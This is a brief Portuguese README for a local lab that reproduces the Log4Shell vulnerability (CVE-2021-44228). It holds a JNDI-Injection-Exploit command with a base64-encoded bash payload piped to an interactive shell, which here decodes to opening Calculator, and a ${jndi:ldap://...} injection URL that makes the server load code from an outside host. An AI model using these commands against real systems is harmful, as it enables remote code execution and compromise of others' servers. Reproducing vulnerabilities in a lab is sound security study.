
CVE-2021-44228 Ambiente de Reprodução de Vulnerabilidade CVE-2021-44228 Ambiente de Reprodução de Vulnerabilidade
Após iniciar o projeto, acesse: http://127.0.0.1:9090/vul
Versão do JDK: java8u92 (evite usar versões muito altas, recomendo usar a mesma versão que eu, versões mais altas têm certas restrições para injeção JNDI)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1
Use a ferramenta acima para gerar o PAYLOAD.
Acesse http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx}